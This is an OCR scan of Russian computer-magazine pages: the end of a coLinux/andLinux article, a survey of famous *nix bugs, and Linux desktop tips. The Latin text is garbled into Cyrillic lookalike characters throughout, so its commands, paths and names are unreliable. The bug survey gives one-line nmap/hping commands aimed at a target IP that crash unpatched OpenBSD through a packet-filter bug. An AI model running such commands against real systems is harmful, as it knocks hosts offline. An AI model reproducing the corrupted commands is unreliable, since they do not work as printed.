ным ѴѴіпсІоѵѵз-драйвером. Это даетему возможность работать на пра- 
вахсамого настоящего ядра, но вто же время не нарушать работу ядра 
ѴѴіпсІоѵѵз. Доступ к оборудованию (такому как видеоадаптер, аудио- 
карта, сетевая карта и так далее) у СоБіпих в этом случае ограничен 
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Внутри ІХС-контейнера 



(все устройства уже заняты драйверами ѴѴІпсІоѵѵз). Поэтому он просто 
запрашивает все нужные ресурсы у других ѴѴіпбоѵѵз-драйверов и 
компонентов родительской ОС. В СоЫпих есть псевдодрайвер сопеі, 
который взаимодействуете сетевым драйвером ѴѴІпсІоѵѵз для того, 
чтобы получить доступ к сети. Драйвер сосоп используется для реа- 
лизации псевдоконсоли І_іпих, которая на самом деле представляет 
собой окно ѴѴІпсІоѵѵз, реализуемое специальным ѴѴіпбоѵѵз-сервисом, 
работающим в паре с СоЫпих-ядром-драйвером. Таким же образом 
внутри СоЫпих реализован псевдодрайвер соЬб, предоставляющий 
доступ кжесткому диску, который находится внутри файла на одном 
из дисков ѴѴІпсІоѵѵз. Для запуска графических приложений исполь- 
зуется Х-серверХппіпд, работающий прямо в ѴѴІпсІоѵѵз (незабываем, 
что X — сетевой протокол, а доступ к сети и, следовательно, к любым 
сетевым приложениям, работающим внутри родительской ѴѴІпсІоѵѵз, 
у СоЫпих есть). Вывод аудио осуществляется через звуковой сервер 
РиІзеАибіо, точно также работающий в ѴѴІпсІоѵѵз и принимающий 
звуковой поток через сеть. 

Со стороны пользователя СоЫпих выглядитчрезвычайно прозрачно. 
Ыпих-приложения запускаются и работают в отдельных ѴѴіпбоѵѵз - 
окнах, исправно функционирует буфер обмена, консоль и даже трей. 
Единственная проблема заключается втом, что ядра ѴѴІпсІоѵѵз и 
Ыпихтеперь работаютв одном адресном пространстве, а это просто 
огромная брешь в безопасности и возможная причина нестабильной 
работы ОС. Но стоитли волноваться по этому поводу на домашней/ 
рабочей/учебной машине? Большинство пользователей ѴѴІпсІоѵѵз 
создают гораздо большую дыру, просто работая под аккаунтом адми- 
нистратора. 

Несмотря нато, что СоЫпих — это всего лишьядро, на сайте проекта 
можно найти адаптированные сборки почти всех популярных дис- 
трибутивов Ыі п их. Огорчаеттолько то, что большинство из нихуже 
устарело (например, последняя версия ІІЬипІи для СоЫпих имеет 
номер 9.04). Проект АпбЫпих ( апббпих.оп ) предлагает более свежую 
сборку II Ьипіи от 22 мая 2009 года, да еще и в двух вариантах (КйЕ 
и ХЕСЕ-редакции, тогда какна официальном сайте СоЫпих ІІЬипІи 
распространяется только в виде базовой системы размером 40 Мб). 
Установить АпбЫпих очень просто, его можно скачать с сайта проекта 
в виде стандартного ѴѴіп б оѵѵз- инсталлятора ( оо.д[/)Кбу2 ) и, ответив 
на несколько вопросов, благополучно установить в свой ѴѴіпбоѵѵз. 
Вопросы инсталлятор АпбЫп их задает довольно оригинальные, 



поэтому на них стоит остановиться подробнее. Первый вопрос каса- 
ется версии ядра СоЫпих: стабильное 0.7.4 против эксперименталь- 
ного 0.8.0. Существенной разницы между ними нет, поэтому выбрать 
можно любое. Второй вопрос касается памяти, выделяемой на нужды 
СоЫпих: 1 28 Мб, 1 92 Мб и далее по возрастающей вплоть до 1 Гб. Это 
всего лишь барьер, все незанятые мегабайты останутся у ѴѴіпбоѵѵз, 
поэтому можно смело выбирать максимум. Далее идут вопросы по 
поводу активации Хппіпд, РиІзеАибіо и режиму запуска. Последних 
у АпбЕіпих целых пять, однако фактически ихтолько два: вручную 
или ЫТ-сервисом. Первый подойдет в тех случаях, когда СоИтих 
ставится «на всякий случай», второй — для повседневного исполь- 
зования. Далее следует ввести имя и пароль пользователя АпбЕіпих 
(интересно, что вопреки традиции II N IX, имя может содержать только 
буквы алфавита и ничего больше), выбрать способ расшаривания 
файловой системы ѴѴіпбоѵѵз для СоЫпих: никакого, специальный 
драйвер СоЕ8 или ЭатЬа (в последнем случае инсталлятор требует 
наличия хотя бы одного расшаренного диска в системе) и, наконец, 
согласиться на немедленную перезагрузку машины. 

Послезагрузки на рабочем столе появятся два ярлыка СоИтих- 
консоли (обычная, в стиле командной строки ѴѴіпбоѵѵз, и расширен- 
ная, со строкой состояния и диагностическим субокном). Трей также 
будет содержать ярлык АпбЕіпих, реализующий не что иное, какменю 
ітеебезкіор. В минимальной версии дистрибутива доступны только 
базовые программы ХЕСЕ-десктопа: терм и нал, те кетовый редактор, 
файловый браузер Тб и па г и менеджер пакетов Зупарбс. Расширен- 
ная КБЕ-версия АпбЫпих содержит почти полный комплектпри- 
ложений КОЕ3.5. 

Адаптировать какой-то современный дистрибутив кСоЕіпихтакже 
вполне себе возможно, воттолько задача эта совсем нетривиальная. 
Для самых смелых на официальном сайте размещено подробное 
руководство. 

Выводы 

Происходящие в мире виртуализации процессы столь стремительны, 
что часто за ними просто невозможно угнаться. За какие-то пол года 
никому не известные академические разработки становятся новым 
стандартом, отправляя текущих «законодателей мод» на свалку. И 
если мы не будем следить за этим бурно развивающимся рынком, то 
рискуем оказаться там же. ц-ц 
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ТАРАКАНЬИ БЕГА 

Обзор самых интересных багов в *піх’ах 

• По данным Гугла, на сегодняшний день существует примерно 
31 000 000 ОрепЗоигсе-проектов, которые суммарно содержат око- 
ло 2 000 000 000 строк кода. Естественно, что в таком количестве 
исходников - миллионы багов, описанные в тысячах багтрекеров. 
Но не все ошибки одинаково интересны - я расскажу о самых зна- 
менитых. 



Самый старый 

Начну обзор с самых старых багов, которые не фи ксились долгие 
годы: либо онихни кто незнал.либоонини кому небыли интерес- 
ны. Первый баг из этой категории почти отпраздновал свои 30 лет, 
когда его пофи ксил и. Скорее всего, этот жук за крался еще в 4.1 ВБ В 
(а может, и еще раньше), откуда успешно перекочевал уже во все 
современные ВБО-системы. Он проявил себя в новых релизах 
БатЬа — сервер падал при попытке доступа к каталогу. Имя героя, 
откопавшего древний баг еще в середине 2008 года, — Марк Бал- 
мер. Сначала Марк винил во всем новый релиз БатЬа, но потом 
нашелбагвОрепВБО’шной библиотеке ІіЬс (если быть точным, 
в файлах ИЬ/Іі Ьс/деп/{ геасісі і г. с.іеіісі і г. с}, отвечающих за доступ 
к каталогам). Ошибку нельзя было обнаружить с более ранними 
версиями БатЬа из-за специального костыля, который в новых 
релизах почему-то убрали. Оказалось, что багзатрагивал все со- 



временные ВБО-системы, в том числе и Мае 05 X. 

Следующему багу, пожалуй, можно вручить чемпионский титул 
бага-долгожителя. Целых 33 года о нем никто не подозревал. За 
нахождение и ликвидацию ошибки можно сказать спасибо двум 
людям - Отто Мёрбеку и Николаю Штурму. Эта история произошла 
также в середине 2008. Отто Мёрбек работал над новой реализаци- 
ей таііос в ОрепВБО, а Николай Штурм тестировал код. В резуль- 
тате тестирования на платформе зрагс64 было обнаружено, что 
иногда компиляция большого С++ проекта может заканчиваться с 
ошибкой Іпіегпаі Сот рі Іег Еггог. Мёрбек начал искать причину этой 
проблемы и обнаружил переполнение буфера в генераторе синтак- 
сических парсеров уа сс( 1 ) : в файле зкеіеіоп.с, в функции уурагзеО, 
происходило обращение к несуществующему элементу массива. 
Для ОрепВБй Отто выпустил шестистрочный патч, исправляющий 
данную проблему. Скорее всего (за давностью лет точно сказать 
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Выбор планировщика ввода-вывода 



Деньги за баги в 
ОрепЗоигсе-продуктах 



В статье я уже упоминал про программу «Деньги за 
исправление багов» от МогіІАа Риззіа. Подобных 
программ не так уж и много, но они есть. Во-первых, 
это «ТЬе Могіііа Бесигііу Вид Воипіу Ргодгат» — 
правда, платят там не за исправление багов, а за 
их поиск (как ясно из названия, подходят только 
уязвимости]. За хорошую уязвимость можно получить 
до $3000 и фирменную футболку :). Подобная 
программа есть и у Гугла для СЬготе/СЬготіит — 
ѴиІпегаЬіІТу Реѵѵагсіз Ргодгат. По этой программе за 
уязвимость можно получить от $500 до $1337. 

уже сложно), баг берет свое начало примерно с II N IX Ѵ6 
(который был выпущен в мае 1975) или ІЛМІХѴ7. 

Самый глупый 

Первый претендент на эту номинацию — 6ПІІВ2, в 
версии 1 .97 которого был обнаружен баг, позволяющий 
очень просто подобрать пароль на загрузчик. Смысл 
ошибки втом, что для ввода пароля необязательно 
знать весь пароль целиком — бРІІВ’у было достаточно 
хотя бы его части. Например, если пароль — хакер, то 
достаточно было ввести «хаке», «хак», «ха» или даже 
просто «х». Таким образом, подобрать любой пароль 
можно было, просто подобрав первый символ. Баг был 
быстренько пофиксен вновойверсии 1.97.1. 

Следующий участник — Ріпд оі 1 ОеаіЬ в ОрепВЗО Раскеі 
Ріііег (СѴЕ- 2009- 0687), был обнаружен 9 апреля 2009 
года и исправлен спустя два дня. Как можно понять из 
названия, ошибка заключалась в возможности вызвать 
кегпеі рапіс с помощью специально сформированно- 
го пакета. Не то чтобы баг сам по себе очень глупый. 
Просто тот фа кт, что ОрепВЗО можно вот та к запросто 
положить одним пингом — это нонсенс и больше похоже 
на первоапрельскую шутку. Уязвимы были все версии 
ОрепВЗО с рі 1 вплоть до 4.5, на всех архитектурах, а 
также N еіВ5 О 5.0 РСЗ. Причем, никаких особых экс- 
плоитов не нужно, достаточно сделать: 

птар -50 $1:аг§е1:_ІР 

или 

бріп§ -0 -Н 58 $*аг§е*_ІР 

К слову сказать, это не первая уязвимость подобного 
рода в ОрепВБО, просто на моей памяти самая широко 
распространенная. 

К примеру, в 2005 году из-за ошибки в драйвере бес- 
проводного адаптера га 1(4) при использовании ІРзес 



ОС тоже паниковала, но уже от самого обычного пинга 
— достаточно было отправить 2 эхо-запроса. Прим, 
ред.: сам себя не похвалишь, никто не узнает — этот 
баг был обнаружен мной во время настройки домаш- 
него ѴѴі-Рі. После исследования проблемы я отправил 
разработчикам детальное описание сценария, при 
котором возникает гетоіе сгазб, конфиги рЕсопІ, 
ізактрб.сопі 1 и ізактрб.роіісу, а также ІгасеЬаск ядра, 
полученный с помощью отладчика сИЬ(4). Тео де Раадту 
и команде понадобилосьтри с половиной месяца, 
чтобы странить эту брешь. И, наконец, чемпион в но- 
минации «Самый глупый» — гл юквпро шив ке первого 
Апбгоіб-телефона НТС 61 . Оказалось, что все нажатия 
клавиш переадресовывались в рутовую консоль. То 
есть, например, набрал ты в 8М5 слово «гебооі», а по- 
том <Еп1ег>, и оченьудивился, что телефон послушался 
и ушел в ребут. А ведь можно и что пострашнее набрать! 
Но нетхуда без добра — с помощью этой ошибки на 61 
можно было легко поставить ОеЬіап. Зх, такой баг по- 
фиксили! :) 

Самый «железный» 

Ни для кого не секрет, что баги в ПО могут выводить из 
строя железо. Хорошо, что встречаются такие ошибки 
очень редко, а широкое распространение получаютеще 
реже. Самый скандальный (а вероятнее, просто раз- 
дутый) за последнее время багтакоготипа — «ІІЬипІи 
убивает ноутбучные винты». 

Винт в ноутбуке отличается от винта на десктопе тем, 
что во время работы отбатареи он периодически оста- 
навливается (паркует головку). Часто при этом слышен 
характерный щелчок. Это реализовано ради экономии 
заряда батареи (еще один плюс — в остановленном со- 
стоянии винт способен выдержать большие перегрузки 
от встряхиваний и падений]. 

И ІІЬипІи все правильно делала — останавливала винт, 
когда он был не нужен. Воттолько на некоторых моде- 
лях это происходило многократно — частично по вине 
прошивки самого винта. С большой долей вероятности 
на таких моделях наблюдалась бы частая парковка 
головок под любой ОС. Посмотреть, подвержен ли твой 
винттакому багу, можно следующим образом. Ставим 
пакет зтагіплопіооіз: 

$ біісіо ар1:-§е1: іп5І:а11 5таг1:топ1:ооІ5 
Если ТВОЙ ВИНТ — зба, ТО: 

$ біісіо зтагЬс-Ы -а /беѵ/зба | §гер І_оасІ_Сус1е 

Последнее число в этой строке — это количество пар- 
ковок головки. У меня это значение равно 13 137, что 
совсем не много. Ресурс обычного ноутбучного винта, 
гарантированный производителем, может доходить до 
600 000. Теперь можно подождать несколько минут/ча- 




ІІЬипіи Нипбгеб 
Рарег Сиіз — специ- 
альный проект, в 
рамках которого к 
каждому релизу ис- 
правляют 100 мелких 
легкофиксящихся 
багов, негативно 
влияющих на юзаби- 
лити. 




НТТР://ѴѴѴШ 



— "і — Г" 

> Ііпкз 

• Подробности про 
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доо.д[/иНоС] : 

• Описание плани- 
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сов и снова проверить это значение, чтобы примерно определить 
скорость, с которой оно растет. 

По идее, быстро расти не должно, так как фикс был доступен еще 
для 8.04 (путем активации менее агрессивного режима сохране- 
ния энергии). Если баг все же присутствует, то можно попробовать 
отключить парковку головок с помощью АРМ (Абѵапсеб Роѵѵег 
МападетепО: 

$ біісіо Мрагт -В 254 /сіеѵ/зсіа 

Если и после этого проблема осталась (как вариант, попалась 
модель с нестандартными значениями АРМ или невозможностью 
управлять АРМ в принципе), то полезно почитать комментарии на 
страничке доо.діѴЫІМЬу . там предлагается несколько возможных 
решений. 

И еще один довольно свежий баг, связанный с железом. Правда, к 
ОрепЗоигсе он не имеет особого отношения. Разве что тот факт, что 
он также проявляется ина *піх-системах. Речь пойдет о закры- 
тых драйверах от ІЧѵісІіа. Весной 2010 года на официальном сайте 
появились новые версии драйверов — 1 96.75 и 1 95.36. 

Спустя некоторое время пользователи начали сообщать о выходя- 
щих из строя видеокартах. Оказалось, что в новые драйвера закра- 
лась ошибка, которая иногда приводила к полному выключению или 
снижению до минимума скорости вращения кулера видеоадаптера, 
несмотря на сильный нагрев видеоядра. После обнаружения бага 
новые версии дров были спешно убраны с сайта, а всем пользова- 
телям было рекомендовано откатиться до старых версий. 
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Ыаігіііиз Рііепате Рераігег — тоже иногда выход. Если 
пользоваться нечасто :) 

открытых окон (АИ+БЫІІ+ТаЬ) будет переключаться раскладка. В 
багтрекереХ.Огд багвиситс2004 года: доо.дІ/ОаВдО . Но вся пробле- 
ма в том, что патч (дружно скажем за него спасибо Илье Муравьеву), 
устраняющий глюк, нарушаетспецификациюХКВ. Аспецификации, 
какизвестно, нарушать нельзя :). Поэтомупока вапстрим патч не 
будет принят, по крайней мере, до внедрения ХКВ2 (а это счастливое 
событие откладывается уже несколько лет). Единственный известный 
мне дистрибутив, который уже включил этотпатч — ІІЬипІи (с версии 
1 1.04). Для более старых версий можно установить патченый Х.Огд 
из рра. Ссылка на баг в ѵбѵнтовском трекере: доо.д[/7Е6иК . Следую- 
щий интересный и достаточно известный вузких кругах баграныше 
был серьезным контраргументом против использования ЕгееВБй на 
десктопе. 

Вызвать его было просто: втыкаем ІІ5В-флешку, монтируем, вытаски- 
ваем флешку не отмонтировав — хоп, получаем Кегпеі Рапіс.Жила 
себе эта ошибка преспокойно с самой первой версии ЕгееВБО вплоть 
до восьмой, в которой поменяли весь ІІ5В-стек. 

И, наверное, самый распространенный баг— кракозябры в нелатин- 
ских именахфайлов при распаковке РАР и ХІР-архивов, созданных 
под ѴѴіпсІоѵѵз. В случае с РАР проблема, какправило, решается очень 
просто: 



Самый массовый 

Выше я описывал баги, которые встречаются неу всех и не часто. 
Пришла пора рассмотреть более массовые экземпляры, с которыми 
сталкивался, пожалуй, любой пользователь *піх-систем. Первый баг 
уже пофиксен, но, думаю, многие его помнят: неработающие хоткеи 
Еігеіюх в русской раскладке на *піх’ах (с т). Был обнаружен 

в 2001 году, а исправлен только спустя семь лет, в Еігеіюх 3 Ьеіа 2. На 
более старых версиях можно было решить проблему костылем в виде 
аддона Риззіап Ноі кеуз Ьидбх. Примечателен багеще и тем, что он 
был исправлен в рамках программы «Деньги за исправление багов» от 
Могіііа Риззіа. Имя героя — Олег Крылов. Могіііа Риззіа готова платить 
за устранение багов, специфичныхдля российских пользователей. 
Размер вознаграждения не очень большой — от $300 до $500, а все 
«лоты», на которых его можно заработать, указаны на страничке про- 
екта: дошдШЬУДХ. Подробнее про вознаграждения за отстрел багов в 
ОрепЗоигсе-продуктах читай во врезке. 

Следующий претенденттоже связан схоткеями, нотеперь проект уже 
посолиднее — Х.Огд, да и затрагивает этот баг всех пользователей, 
внезависимости от раскладки. Описатьего можнотак: применение 
хоткея происходит при нажатии, а не при отпускании клавиш. Приведу 
пример: допустим, переключение раскладки клавиатуры в системе 
забиндено на <АІ1;+5Ы1 : 1;>. Тогда вместе с прокручиванием назад списка 



$ біісіо ар1:-§е1: гетоѵе гаг 
$ біісіо ар1:-§е1: іпзііаіі ипгаг 

С 2ІР все гораздо сложнее. На ІаипсбрасГеуже давно виситбаг доо. 
дІ/У5УѴ| . собравший более сотни комментариев (правда, не все из них 
одинаково полезны) и около 1 000 голосов (благодаря недавно про- 
шедшему «флешмобу» баг поднялся на второе место в ІаипсбрасІ по 
количеству голосов), подтвердивших существование проблемы. Одно 
время этуошибку номинировали в категорию НипбгебРарегСиІз-это 
позволило было надеяться на то, что ее скоро исправят. Однако вскоре 
одумались (видимо, посчитав, что фикс слишком сложен). Рассмотрим, 
какие решения есть на данный момент. 

1. Поставить АИЫпих, там эта проблема решена. 

2. Попытаться прикрутить решение из АИЫпих в свой дистрибутив. К 
сожалению, не всетактривиально, как может показаться на первый 
взгляд. Кроме самого патча на 2 Ір/ип 2 Ір, придется прикручивать 
еще специальную библиотеку Іібпаізрес. Для ІІЬипІи есть рра: доо. 
дІ/АЕЗОд (здесь лежат патченные гір/ипгір) и доо.дІ/еООАе (здесь — 
ІіЬпаІзрес). 

3. Собрать последнюю бета-версию ипгір: юо.д[/0Вс19У . Ксожалению, 
это решение работаеттолько для некоторых архивов и не устраняет 
проблему полностью. 

4. Перекодировать имена распакованных файлов с помощью сопѵтѵ 
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ТРІ,1ф»ЦІН щііицад 
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(который надо предварительно установить): 



$ сопѵтѵ --Р ср866 -1: и1:-Р8 -г --поігезі: * 



5 . Поставить скрипт для Ыаибіиз: 



$ зисіо ар1:-§е1: Іпз1:а11 паиігііиз-біепате-гераігег 

Самый неуловимый 

Этоттитул безоговорочно отходит #1 2309. 1 2309 — баг-легенда, 
летучий голландец. Им пугают начинающих линуксоидов, его ис- 
пользуют какжелезный аргумент в холиварах Ыпих ѵз ЕгееВЗБ ѵз 
ѴѴіпбоѵѵз. Проявляется он на абсолютно разном железе и на разных 
конфигурациях ядра и файловых систем. Сам ба г звучит как«І_агде 
1/0 орегаііопз ге з и И: іп роог іпіегасбѵе регЬгтапсе апб бідб іоѵѵаіі; 
Іітез», и его обсуждение собрало более 550 комментариев: доо.ді/ 
иМКЕп . Багбыл описан в декабре 2008 года и на данный момент 
имеет приоритет Р1 бідб. Проверить, восприимчива лик нему твоя 
система, очень просто. Нужно всего лишьзапустить: 



$ сісі і-р=/сІеѵ/ 2 его о-Р=/1:тр/1:е5І: Ьз=1М соип1:=1М 



и понаблюдать за отзывчивостью ОС, особенно графических при- 
ложений. Если при этом дико подскочетѵѵа (а с ним и ІА], и система 
станет неюзабельной чуть более, чем полностью, — бинго, ты 
поймал 1 2309. 

На самом деле 1 2309 — это не один, а несколько багов, смешанных в 
кучу. Можно выделить следующие случаи появления: 

• при копировании больших объемов данных с винта на винт(или с 
раздела на раздел одного винта); 

• при нехватке ОЗУ (и, соответственно, диком своппинге); 

• при копировании на ІІЗВ-девайсы; 

• при использовании зашифрованных разделов; 

Соответственно, фиксы тоже будут разные: 

1. Смена планировщика ввода-вывода на какой-нибудь не-с!д. По- 
смотреть текущий планировщик можнотак: 



$ саі: /зуз/ЬІоск/зсІХ/диеие/зсбесІиІег 



где збХ— нужный девайс (обычно — зба). Используемый в данный 
момент планировщикбудетуказан в квадратных скобках. Можно 
сменить планировщик и посмотреть на результат: 



# есбо беасіііпе > /зуз/ЬІоск/зсІХ/диеие/зсбесІиІег 
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Кракозябры в 2Ір-архиве 



Чтобы выбранный планировщикустанавливался при загрузке, 
нужно передать ядру параметр еІеѵаІог=беабІіпе. В случае с дгиб 
необходимо изменить строку ѲРІ)В_СМБиМЕ_иі\ІІІХ_БЕРАІІЕТ в 
/еІс/сЫаиІіУдгиЬ, а затем обновить конфигурацию: 

$ зисіо ирба1:е-§пиЬ 

2. Настроить ОС на менее агрессивное использование зѵѵар: 

# есбо 10 > /ргос/зуз/ѵт/зыарріпезз 

Теперь система начнет использовать зѵѵар только в том случае, если 
свободной ОЗУ останется меньше 1 0%. В ІІЬипІи, например, значе- 
ние зѵѵарріпезз по умолчанию — 60. Чтобы значение не менялось 
после ребута, не забудь добавить его в/еІс/зузсіЕсопЕ 

3. Добавить ОЗУ. Часто проблема возникает при активном исполь- 
зовании зѵѵар. 

4 . В некоторых случаях помогает смена ядра на что-нибудь старше 
2.6.1 7 или новее 2.6.34. 

Кслову, я сам несколько раз видел 1 2309, нотолько на ядрах < 2.6.35. 
Иногда глюк проявляется только при копировании на ІІЗВ-носитель. 

Самый-самый 

Самый важный багзарегистрирован под гордым первым номером в 
багтрекере ЦЬипІи. Ьидз.іаипсбрасі , 20 августа 2004 и называет- 
ся «Місгозок баз а таргііу татке! збаге». Авторство принадлежит 
Марку Шаттлворту. Мой вольный перевод описания: 

«У Місгозок доминирующее положение на рынке десктопов. ІІЬипІи 
создана для того, чтобы пофиксить этот баг. Закрытое ПО сдержива- 
ет инновации в ІТ-отрасли, ограничивает доступ к ІТдля небольшо- 
го процента мирового населения и не позволяет разработчикам во 
всем мире в полной мере реализовывать свой потенциал. Этот баг 
очень широко распространен. 

Способ воспроизведения бага: 

Посетить компьютерный магазин в своем районе. 

Что мы там увидим: 

1. Большинство ПК продается с предустановленным закрытым ПО. 

2 . Очень небольшая доля ПК продается с предустановленной 
ІІЬипІи и/или другим свободным ПО. 

Что должны будем увидеть: 

1 . Большинство новых компьютеров должны включать только сво- 
бодное программное обеспечение — например ІІЬипІи. 

2. ІІЬипІи должна продвигаться таким образом, чтобы ее удивитель- 
ные возможности и преимущества были очевидны и известны всем. 

3. С течением времени система должна становиться все более и 
более дружественной пользователю.» 

Странно, что на момент написания статьи этот ба г затрагивает всего 
619 человек, однако имеет 1 500 комментариев. Будем с нетерпени- 
ем ждать фикса :). 

Заключение 

Да, в больших ОрепЗоигсе проектах много багов. Но и в больших 
проектах с закрытыми исходниками ихнеменьше — просто не всег- 
да они доступны широкой общественности. Большое преимущество 
ОрепЗоигсе здесь втом, что при желании ты сам можешь провести 
аудит кода и поправить любой баг. т 
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ІІЫІХОЮ 



■ ■ Евгений Зобнин (ехесЬіЬги) 




ПЛЮШКИ 
ДЛЯ ДЕСКТОПА 

Делаем рабочий стол проще и удобнее 



• В этой статье я расскажу о нескольких способах сделать свою 
жизнь в иксах проще и эффективнее. Описанные методы почти не 
связаны между собой, поэтому их можно применять независимо 
друг от друга. 

это дополнительные тормоза (ксіт и дсіт действительно довольно 
толстые программы, которые стартуют отнюдь не мгновенно). 
Однако можно отказаться от менеджера логина совсем. Один из 
лучших методов решения этой задачи описан в АгсЫіпих ѴѴікі ( ѵѵікі 
агсЫіпих.огд ). Заключается он втом, чтобы на последнем этапе за- 
грузки сразу запускать иксы с правами нужного пользователя. Для 
этого надо всего лишь добавить в конец файла /еІс/іпіиаЬ следую- 
щую строку: 

х:5:опсе:/Ьіп/5и имя_юзера -1 -с "/Ьіп/ЬаБІі 
--1о§іп -с 5І:аг1:х >/сІеѵ/пи11 2>/сІеѵ/пи11" 

Атакже убедиться в том, что по умолчанию система грузится до 



Логинимся в иксы автоматически 

Линуксоиды любят пароли. Очень любят. Воттолько большинство 
из них почему-то забывают, что на домашней машине или ноутбуке 
пароль не имеет никакого значения. Перезагрузить машину и затем 
выбрать пункт меню, содержащий фразу «Га і I эабе», взагрузчике 
ОгиЬ сможет даже твоя бабушка или пятилетний брат. Поэтому, на- 
строив автологин, ты не сделаешь машину менее безопасной, зато 
навсегда освободишь себя от необходимости ввода этого длин- 
ного запутанного пароля. В средах КйЕ и Ѳпоте автологин можно 
настроить с помощью специальных графических конфигураторов, 
которыми просто и легко пользоваться. Но утакого способа есть 
один существенный недостаток: менеджер входа в систему (в КОЕ 
он зовется кбт,авОпоте — дбт) запускается в любом случае, а 
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Главное окно еазузігоке 



пятого уровня (в началетого же файла должна быть 
примерно такая строка: «ісі :5 :іп Иісіе^аиіі: :»). При этом 
команды, необходимые для запуска графической 
среды, нужно поместить в файл -/.хіпіігс. Например, 
если ты используешь КйЕ, то файл должен содержать 
строку «ехес зіагіксіе», бпоте — «ехес дпоте-зеззіоп», 
РІихЬох — «ехес ЛихЬох» и так далее. 

Особая красота этого метода заключается в том, что ак- 
каунт пользователя остается в безопасности, поскольку 
мы не меняли ничего в его настройках и не обнулили 
пароль. 

Рулим ѴѴМ из командной 
строки и скриптов 

Существует очень полезный стандарт, который описы- 
вает способ взаимодействия между менеджером окон и 
всем остальным миром в виде утилит, демонов и прочих 
сервисов. Называется он ЕѴѴМН (Ехіепбесі ѴѴіпсІоѵѵ 
Мападег Ніпіз], а его польза заключается в том, что он, 
во-первых, делает менеджеры окон универсальными 
(например, если ты соберешься заменить ѴѴМ в своем 
Ѳпоте на что-то более интересное, чем Меіасііу, то 
бпоте даже не заметит подмены и будет продолжать 
исправно функционировать), а во-вторых, определяет 
способ управления любым ЕѴѴМН-совместимым ѴѴМ из- 
вне, без каких-либо дополнительных костылей. 
Естественно, для управления нужна какая-то програм- 
ма, которая будет выступать в роли клиентской стороны 
в процессе обмена ЕѴѴМН-совместимыми сообщениями 
с ѴѴМ. Одна изтаких программ называется ѵѵтсігі, и она 
умеет вертеть менеджером окон какугодно, делая с ним 
практически все, что можно сделать напрямую, исполь- 
зуя мышь и клавиатуру. Но самое важное, что ѵѵтсігі 
— утилита командной строки, поэтому ее можно легко 
запихнуть в скрипт, который будет выполнять сложные 
манипуляции. 

Пример первый. Допустим, что каждый твой день 
начинается с включения компа, запуска нескольких 
приложений и включения музыки. Вручную все это за- 
пускать уже надоело, а менеджер окон делает это как-то 
неумело (либо вообще не делает). К тому же было бы 
удобнее иметь универсальное решение, независящее 
от конкретного ѴѴМ, да еще и способное располагать 
окна на нужных рабочих столах и в нужных местах экра- 
на. Нет проблем, просто устанавливаем ѵѵтсігі и пишем 
простой скрипт: 

# ѵі ~/Ьіп/ѵѵт-5ІагІир.5И 

# ! /Ьіп/зМ 

# Запускаем нужные приложения 




Запускаем РігеЬх через Споте Оо 

сЬготіит & 
аисіасіоиз & 
хіегт -с тсаЬЬег & 



# Ждем пять секунд, чтобы все это успело появиться 
на экране 

зіеер 5 

# Отправляем сЬготіит на второй рабочий стол и 
растягиваем на весь экран 

ытсіігі -г сЬготіит -1: 2 

іл/тсігі -г сЬготіит -Ь асІсД-РиІІзсгееп 

# Сворачиваем аисіасіоиз, чтобы не мешал 
іл/тсігі -г аисіасіиз -Ь асісі, зЬасІесІ 

# Отправляем хіегт с открытым тсаЬЬег на второй 
рабочий стол, задаем ему нужный размер и 
располагаем в левой верхней части экрана (50,50) 
іл/тсігі -г тсаЬЬег -1: 2 

мтсігі -г тсаЬЬег -е '0, 50, 50, 600, 300-’ 

# Делаем окно сЬготіит активным, выводим его на 
передний план и переключаемся на его рабочий стол 
мтсігі -а сЬготіит 

Обрати внимание, что для управления тсаЬЬег я 
использовал его имя, несмотря на то, что тсаЬЬег 
не является графическим приложением, а значит, по 
логике, не может быть адресован с помощью ѵѵтсігі. 

Но эта команда работает, поскольку, во-первых, ѵѵтсігі 
позволяетуказывать только часть имени окна при его 
адресации, а во-вторых, хіегт меняет имя своего окна, 
указывая в нем имя запущенного в данный момент 
приложения. 

Пример второй. У всех нас есть набор приложений, ко- 
торые всегда должны быть под рукой, но большую часть 
времени не нужны. Это, например, программа для 
ведения заметок, ІМ- клиент, терминал — обычно они 
висят в фо не/трее и ждут своего часа. Однако каждый 
раз использовать мышь, чтобы нажать на значок, кото- 
рый выводит программу из трея, либо разворачивает 
ее из таскбара, довольно утомительно. Лучше доверить 
работу ѵѵтсігі: 




> іпіо 



• Когда будешь 
править конфиг хпеиг, 
имей в виду, что у про- 
граммы нет вшитых 
дефолтовых настроек, 
поэтому удаленная 
строка из конфига = 
удаленная функция из 
программы. 



• Для хпеиг есть 
хорошая и очень 
функциональная гра- 
фическая оболочка 
под названием дхпеиг 
( хпеиг.ги/сіоѵѵпіоасіз/ ). 



• Джеда йский путь 
настроек горячих 

и мультимедийных 
клавиш — команда 
хтоЬтар из комплек- 
та Х.Огд. 

• Для настройки го- 
рячих клавиш также 
можно использовать 
команду хЬіпсІкеуз 

( ЫЦ[у/8аН1ЛЬ ). 
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Окно настроек дхпеиг не умещается на рабочий стол руіуіе в ІІЬипІи 10.10 
800x600 



$ шісігі -г тсаЬЬег -Ь 1:о§§1е^ Місісіеп 

Это все. Команда выводитокно на передний план, если оно сверну- 
то, и прячет, если окно находится на экране. Достаточно поместить 
ее в скрипт, повесить на хоткей, и проблема решена (ты, наверное, 
догадался, что таким образом можно реализовать а нал о г уаки а ке 
или ІіШе, придется только изменить название терминала, чтобы 
ѵѵтсігі всегда безошибочно его находил). Подобные скрипты можно 
использовать не только для запуска нужных программ после старта 
ОС, но и для многих других задач, например, переключения между 
«режимами работы»: один скрипт активирует набор приложений 
для отдыха (браузер, медиаплеер), другой — для работы (среда раз- 
работки, браузер с открытой документацией). Их можно повесить на 
хоткей и забыть про ручную раскладку окон раз и навсегда. 




В кругах ІІІМІХ-джедаев часто можно слышать разговоры о так 
называемыхтайловых менеджерах окон. Достоинство таких ѴѴМ в 
том, что они никогда не накладывают окна друг на друга, размещая 
их та ким образом, чтобы приложения делили между собой весь 
экран, а незанятых областей экрана не оставалось (скриншот хо- 
рошо демонстрирует эту концепцию). Такой способ расположения 
окон оказывается очень полезным на широкоформатных монито- 
рах, большая часть пространства которых обычно оказывается пу- 
стующей. Но где достоинства, там и недостатки: ктайловым ѴѴМ очень 
трудно привыкнуть, ктомуже в основном графический софт просто 
не рассчитан на применение втакой конфигурации. Поэтому был 
придуман инструмент под названием руіуіе ( руіуіе .сот ). который над- 
страивается над существующим ѴѴМ, добавляя ему функцию тайловой 
раскладки окон. При этом вся функциональность оригинального ѴѴМ 
сохраняется, атайлингактивируется и деактивируется с помощью 
клавиатурных комбинаций. 

